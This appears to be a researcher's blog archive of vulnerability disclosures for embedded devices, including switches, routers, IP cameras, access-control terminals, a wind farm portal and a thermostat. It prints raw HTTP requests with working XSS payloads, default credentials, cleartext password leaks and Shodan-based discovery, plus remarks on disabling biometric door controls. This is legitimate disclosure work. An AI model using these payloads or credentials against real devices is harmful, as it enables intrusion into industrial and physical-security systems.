Posts Tagged ‘XSS’

Alcatel-Lucent OmniSwitch 6250 Switch sys_filesystem_info_si.html Multiple Parameter Stored XSS

March 1, 2016

The Alcatel-Lucent OmniSwitch 6250 Switch has a cross-site scripting (XSS) vulnerability in the /sys/content/sys_filesystem_info_si.html page (CVE-2016-78002). An authenticated user with permission to update the fields can inject arbitrary JavaScript into three fields that will be stored and displayed on /phys/content/phys_chs_info_stable.html when viewed. The fields/parameters are Contact (EmWeb_ns:mip:208.T1:O1 parameter), Name (EmWeb_ns:mip:209.T1:O2 parameter), Location (EmWeb_ns:mip:210.T1:O3 parameter) which are updated by a POST request.

The payload looks like:

EmWeb_ns%3Amip%3A208.T1%3AO1=Alcatel-Lucent+%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A209.T1%3AO2=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-name%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A210.T1%3AO3=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A211=Apply

KZ Broadband iSurf 1004 / 1008 Multiple Vulnerabilities

January 26, 2016

KZ Broadband Technologies, LTD. iSurfTM 1004 and 1008 Integrated Access Devices install with a default admin account for the web interface according to the manual.

isurf-defaults

I confirmed this works on iSurf 1004 V2.10 B02D09 Pack 02, iSurf 1004 IAD V2.10 B02D09 Pack 03 and iSurf 1008+ V2.10 B02D09 Pack 23.

The router allows multiple accounts and offers different access levels making cross-site scripting a concern. There is a very basic XSS bug (CVE-2016-78001):

GET /en/cgi/SysSetContact.cgi?sys_contact=DF”><scr1pt>alert(‘DF’)</scr1pt> HTTP/1.1

The script will render on /en/sys_info.htm:

<td><textarea cols=”60″rows=”5″id=”contact”class=”select”></textarea>
<input type=”hidden”name=”sys_contact”value=”DF”><scr1pt>alert(‘DF’)</scr1pt>”>

Screenshot PoC:

isurf-xss1

Barix Streaming Client Multiple Vulnerabilities

September 10, 2015

The Barix Streaming Client is a product that “can deliver high quality branded audio in real time via the internet or a local network to an unlimited number of locations and gives the option for localized and targeted ad insertion too, all via live streaming.

It uses a web interface for device management. By default it does not require authentication and does not appear to allow you to set a user account just a password. Version B3.14 was tested and found to have additional problems!

Unauthenticated access –

barix01

You can manipulate streaming settings and change the audio the person hears –

barix02

Under Configuration -> Advanced Settings, the ‘User Agent’ field is not sanitized. Inserting script code triggers a POST request to /setup.cgi and updates the ‘S517’ parameter allowing for cross site scripting (CVE-2015-78000) that renders on uifadvanced.html –

barix03

barix04-xss

It also renders on /ixstatus.html –

barix06-rendered

The security settings that allow for a password –

barix05-default

You can also manually reboot the device or create a script that will continually reboot it –

barix07-reboot-dos

AXESS TMC X1 / X2 Multiple VUlnerabilities

December 30, 2013

AXESS TMC makes a set of terminals that manage Time & Attendance as well as Access Control. For example the X1 and X2 perform a lot of functions in a compact unit and still offer remote management capability (Shodan search and look for “X1/X2 Configuration”).

These devices have default administrator credentials for the web and FTP interface: admin / admin

As an admin you can gain access to other passwords due to them being stored in plaintext. For the web interface they are shown on the different screens. For FTP (or HTTP browse file menu) they are available in the PARAMETERS.TXT file:

OperatorPassword=00000
RemotePassword=admin

[GPRS]
[..]
User=””
Password=””

[FtpClient]
ServerURL=
User=””
Password=””

[USB]
Enabled=1
PasswordUSB=00000

There is an XSS vulnerability in /file_manager.cgi (CVE-2013-78000) via file upload as demonstrated here:

x1-xss1

x1-xss2

x1-xss3

For red teamers access to this device could allow for remote disabling of physical security features. The /biometric.cgi page lets you manipulate the biometric sensors or disable them completely if they are already enabled. It isn’t as good as popping the door locks but sure makes it easier for physical access!

x1-biometrics

The /access.cgi page can also let you manipulate access controls or disable them completely:

x1-accesscontrol

Vilar Multiple IP Camera Multiple Vulnerabilities

December 22, 2013

The Vilar IP Camera model IP-001A is probably the Monacor VWC-300PT camera under different branding. Even the manual uses the VWC-300PT header but refers to as the Vilar elsewhere! The Vilar IP-001A running firmware 1.1.0.32 has default administrative credentials:

After that click [ok] and then enter the administrator’s username as “admin” and the administrator password as “123456”.

There is also a stored cross-site scripting vulnerability in the /setup/user_account.html page. If you create a user (even with guest privileges) and use an XSS payload for the name, it will save ti and render it on subsequent loads (after it reboots the camera). The URL of this page is http://%5Btarget%5D/cgi-bin/action?action=loadpage&page=/setup/user_account.html&lang=eng but once you input the information it actually gets updated using the http://%5Btarget%5D/cgi-bin/action script. Example payload:

action=write&cfg_content=useraccount&lang=eng&Account_Name1=admin&Account_passwd1=**********&Account_access1=4&Account_Name2=user&Account_passwd2=**********&Account_access2=2&Account_Name3=roger&Account_passwd3=**********&Account_access3=2&Account_Name4=guest&Account_passwd4=**********&Account_access4=1&Account_Name5=df”><script>alert(‘DF’)</script>&Account_passwd5=df&Account_access5=1&Account_access6=0&Account_access7=0&Account_access8=0&Account_allowVisit=0&submit=Apply

vilar-xss1

IQ3 Trend LAN Controller – Multiple Reflected XSS

October 23, 2013

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw I poked at one without authentication. By default you are given system guest access which lets you see the status of components. Some of these pages allow for cross site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf”><alert>(‘DF’)</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

iq3-xss1

2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub pages in the format Z#(W).htm for each of 10 zones. Each of these pages have a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week”><alert>(‘DF’)</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS

Nordex NC2 Wind Farm Portal Reflected XSS

October 18, 2013

Another saved Shodan search this one for Nordex NC2 Wind Farm Portal software. Copied some of the software (version 11.06.11) over due to it allowing open directory browsing (go to /1_07_00/nc2/program_en/ for example) and checked for issues:

POST /login HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/11_06_11/index_en.jsp
Proxy-Connection: Keep-Alive
Content-Length: 129
Content-Type: application/x-www-form-urlencoded

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&pw=nordex&language=en

nordex-xss1

update: ICS-VU-308064

Dreambox Bouquet Editor – Multiple XSS

October 11, 2013

Dreambox Bouquet Editor is a third-party plugin for Enigma2 set top box software to more easily manage bouquets. (Shodan search)

#1 /bouqueteditor/web/getservices newName Parameter Stored XSS (CVE-2013-78005)

Visit http://10.0.1.1/bouqueteditor/ and rename a bouquet with a standard XSS string. The next time /bouqueteditor/web/getservices reloads the payload fires.

POST /bouqueteditor/web/renameservice?sRef=1:7:1:0:0:0:0:0:0:0:FROM%20BOUQUET%20%22userbouquet.___script_alert__df____script___tv_.tv%22%20ORDER%20BY%20bouquet&mode=0&newName=%22%3E%3Cscript%3Ealert(‘findme’)%3C%2Fscript%3E HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

#2 /bouqueteditor/web/addbouquet name Parameter Stored XSS (CVE-2013-78005)

Add a new bouquet and use your regular XSS string. As soon as it is added the page will refresh and trigger the code:

dreambox-xss01

POST /bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert(‘DF’)%3C/script%3E&mode=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

dreambox-xss02

Heatmiser NetMonitor – Multiple Vulnerabilities

October 9, 2013

“The Heatmiser Netmonitor is a self contained unit allowing you to control your heating system over the internet from any web browser. Simply plug the Netmonitor in to your router and take complete control.” (Shodan search)

Affecteed: NetMonitor 1.04, 1.1, 3.02, 3.03, 3.7, 3.8 for default creds 3.8 tested for rest

#1 Default Admin Credentials

According to the manual the default is admin / admin.

heatmiser-login

#2 Cleartext Admin Password Disclosure

GET /networkSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/left.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive

heatmiser-cleart

#3 Multiple Stored XSS (CVE-2013-78006)

Using the standard “>alert(‘DF’) XSS string the following pages are vulnerable. They require admin authentication or can exploited via cross-site request forgery (CSRF):

POST /statSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/statSetup.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive
Content-Length: 424
Content-Type: application/x-www-form-urlencoded

rdbkck=0&statname=Towel+Rails%23Utility+Room%23Kitchen%23Dining+Room%23Lounge%23Bed2+%26+En-suite%23Bed3%23″>alert(‘DF’)%23Upstairs+Rads%23Room+10%23Room+11%23Room+12%23Room+13%23Room+14%23Room+15%23Room+16%23Room+17%23Room+18%23Room+19%23Room+20%23Room+21%23Room+22%23Room+23%23Room+24%23Room+25%23Room+26%23Room+27%23Room+28%23Room+29%23Room+30%23Room+31%23Room+32&statmap=11111111100000000000000000000000

heatmiser-xss1

These pages are also affected:
/sensorSetup.htm – POST Method – snstitle, snstemp and snsalmen parameters (likely 8 more but didn’t test)
/inputSetup.htm – POST Method – inputtitle parameter
/outputSetup.htm – POST Method – outputtitle parameter

There rest of the setup pages are probably vulnerable since it didn’t seem like anything was being sanitized but I didn’t have time to check.

Agilent E5810A LAN/GPIB Gateway – Multiple Vulnerabilities

October 7, 2013

The E5810A LAN/GPIB Gateway from Agilent has several vulnerabilities.

#1 Unauthenticated Telnet Access

According to the manual you can telnet to the device for backward compatibility to configure:

For backward compatibility with the E2050 LAN/GPIB Gateway, the Telnet Utility functionality is provided with the E5810. However, E5810 Web Access is the preferred method to configure the E5810.

Testing this:

df ~$ telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.
Welcome to the E5810 LAN/GPIB Gateway Configuration Utility.
Controls GPIB and RS-232 interfaces via the LAN

Commands
? View Available Commands
exit, quit Exit WITHOUT Saving Configuration Changes (see reboot)
reboot Save Configuration Changes and Restart E5810
status View the LAN/GPIB Gateway Connection Status

Read-only E5810 Parameters
hardware-addr: 0030D30969B9 # Ethernet (MAC) Address
serial-num: MY43003219 # Serial Number

Configurable Parameters saved in E5810 non-volatile memory
(Note: Some E5810 current values “in-use” may be different)
dhcp: OFF # Configure LAN for DHCP boot
ip: 1.2.3.4 # Internet Protocol (IP) Address
subnet-mask: 255.255.255.0 # Network Subnet Mask
gateway: 1.2.3.1 # Network Gateway

dns-server: 4.3.2.1 # DNS Server
hostname:
# Internet Hostname

description: Agilent E5810 (00-30-D3-09-69-B9)
# Device Description (UPnP Friendly Name)
upnp: ON # Configured as UPnP device

lan-timeout: 7200 # LAN Timeout (Keepalive) in sec
io-timeout: 120 # I/O Timeout in seconds

gpib-name: gpib0 # GPIB SICL Interface Name
gpib-address: 21 # GPIB System Controller Address
gpib-unit: 7 # GPIB Logical Unit (LU) Number

rs232-name: COM1 # RS-232 SICL Interface Name
rs232-baud: 9600 # RS-232 Baud Rate
rs232-bits: 8 # RS-232 Bits
rs232-stopbits: 1 # RS-232 Stop Bits
rs232-parity: NONE # RS-232 Parity
rs232-flow: NONE # RS-232 Flow Control
rs232-srq: RI # RS-232 SRQ

> ?
Available commands are:
help View Help Information
? View Available Commands
config View Configured Settings
serial-num View the Device Serial Number
version View the Firmware Revision
hardware-addr View the Ethernet (MAC) Address
dhcp Turn OFF or ON the use of DHCP
ip View/Set the IP Address
subnet-mask View/Set the Network Subnet Mask
gateway View/Set the Gateway Address
dns-server View/Set the DNS Server Address
hostname View/Set the Internet Hostname
description View/Set Device Description (UPnP Friendly Name)
upnp Turn OFF or ON the use of UPnP
lan-timeout View/Set the LAN Timeout (Keepalive). 0 is Off.
io-timeout View/Set the Server I/O Timeout. 0 is Off.
gpib-name View/Set the GPIB SICL Interface Name
gpib-address View/Set the GPIB System Controller Address
gpib-unit View/Set the GPIB Logical Unit Number
rs232-name View/Set the RS-232 SICL Interface Name
rs232-baud View/Set Baud
rs232-bits View/Set number of RS-232 data Bits
rs232-stopbits View/Set number of RS-232 Stop Bits
rs232-parity View/Set the RS-232 Parity
rs232-flow View/Set the RS-232 Flow Control
rs232-srq View/Set the RS-232 SRQ Line
status View the LAN/GPIB Gateway Connection Status
syslog-display View Contents of the Syslog
syslog-clear Clear the Syslog
password Enter the Password (when prompted)
(Password is required when making changes)
changepassword Change the Password (when prompted)
reboot Save Configuration and Reboot E5810
factory-reset Reset Config to Factory Defaults and Reboot
exit Exit WITHOUT Saving Configuration (see reboot)
quit Exit WITHOUT Saving Configuration (see reboot)
bye Exit WITHOUT Saving Configuration (see reboot)

> quit

E5810 Non-UPnP parameters are UNCHANGED.
Telnet session will end.

Connection closed by foreign host.

#2 Default Password for Web Interface

From the manual:

The E5810 uses these default configuration values until you set any other configuration values.
Password E5810

#3 password.html Cleartext Password Disclosure

Regardless of what the password is the password.html page will send you the current one. It only uses JavaScript to obscure it so looking at the source reveals it:

http://1.2.3.4/html/password.html

agilent01

agilent02

#4 config_lan.html hostName Parameter Stored XSS (CVE-2013-78007)

Go to the configuration and change the hostname. It has local JavaScript to block special characters but use a proxy and send a regular XSS string:

POST /html/config_lan.html HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/html/config_lan.html
Proxy-Connection: Keep-Alive
Content-Length: 451
Content-Type: application/x-www-form-urlencoded

Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&subnetMask=255.255.255.0&subnetAddress=1.2.3.4&DNSserver=4.3.2.1&hostName=alert(‘df’)&description=Agilent+E5810+%2800-30-D3-09-69-B9%29&UPnPSetting=1&lanTO=7200&ioTO=120&gpibName=gpib0&gpibAddr=21&gpibLU=7&rs232Name=COM1&BaudSetting=9600&ParitySetting=NONE&BitsSetting=8&StopBitsSetting=1&FlowSetting=NONE&SrqSetting=RI&passOld=&curPassOld=E5810&pass1=&pass2=&ContinueOn=True

aglient03-xss